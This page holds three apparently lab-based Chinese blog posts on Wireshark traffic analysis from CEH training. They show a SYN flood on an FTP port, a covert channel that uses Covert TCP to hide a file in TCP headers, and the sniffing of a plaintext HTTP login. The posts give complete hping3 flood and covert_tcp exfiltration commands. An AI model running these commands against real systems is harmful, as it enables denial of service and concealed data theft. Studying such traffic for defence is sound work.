發表文章

目前顯示的是有「WireShark」標籤的文章

分析 SYN Flood 網路攻擊流量

圖片
 分析 SYN Flood 網路攻擊流量 於攻擊端執行 SYN Flood 針對目標主機 FTP Service 進行攻擊 指令 : sudo hping3 --flood --rand-source -S -p 21 10.10.10.10 參數 --flood : 指定發送大量封包 參數 --rand-source : 隨機產生來源端 IP 參數 -S : 指定 TCP SYN 旗標 參數 -p : 指定通訊 Port 攻擊前確認目標主機有 Listen 21 Port FTP Service 效能使用率低 攻擊後效能開始飆高 透過 netstat 可以看到隨機的來源 IP 連線本機端 21 Port 開啟 WireShark 監看 TCP 流量 封包中一樣顯示來源的隨機 IP,無法找出特定的攻擊端

分析 Covert TCP 網路流量

圖片
 分析 Covert TCP 網路流量 使用工具 Covert TCP,將未編譯檔案複製至要接收訊息的主機 (10.10.10.9) 檔案位於工具包路徑 E:\CEH-Tools\CEHv11 Module 06 System Hacking\Covering Tracks Tools\Covert_TCP 底下 ls 確認檔案存在於 Home 底下,進行編譯 指令 : gcc covert_tcp.c -o covert_tcp 再 ls 一次確認編譯完成檔案存在 執行指令開始接收訊息 指令 : sudo ./covert_tcp -dest 10.10.10.9 -source 10.10.10.13 -dest_port 8008 -source_port 9009 -server -file received.txt 參數 source : 送訊息的主機 參數 dest : 接收訊息的主機 同樣於要傳送訊息的主機 10.10.10.13 執行相同作業將工具進行編譯並確認存在 於要傳送訊息的主機建立一個文字檔 send.txt 當中的文字為 [ Top Secret!! ] 於送訊息主機端開啟 WireShark 進行封包抓取,過濾時選擇 TCP 即可 傳送端執行指令開始進行訊息傳送 指令 : sudo ./covert_tcp -source 10.10.10.13 -dest 10.10.10.9 -source_port 8008 -dest_port 9009 -file send.txt 注意這裡 -source、-dest 與前面一樣,但是 Port 的 source & dest 剛好顛倒 執行後可以看到開始傳送文字檔中的訊息如下 於接收端同樣可以看到文字訊息檔一個一個傳送過來,傳送完畢後可以 cat 檔案看一下內容 開啟 WireShark 可以看到傳送的訊息包在 TCP 封包表頭中,一個封包塞入一個文字慢慢傳送

分析 HTTP 協定網路流量

圖片
 分析 HTTP 協定網路流量 安裝 WireShark 路徑位於 E:\CEH-Tools\CEHv11 Module 03 Scanning Networks\Banner Grabbing Tools\Wireshare 開啟 WireShark 後設定過濾僅包含 10.10.10.19 目標主機的相關封包 參數 : host 10.10.10.19 開啟瀏覽器登入 10.10.10.19 主機的網站 網址 http://10.10.10.19/goodshopping/ 點選 Login 輸入帳號 smith 密碼 smith123 點選登入 於 WireShark 視窗中輸入參數 urlencoded-form 即可看到剛剛登入的帳號密碼於封包中 個人偏好使用參數 http.request.method == POST 來查閱 因為送出帳號密碼一定是 POST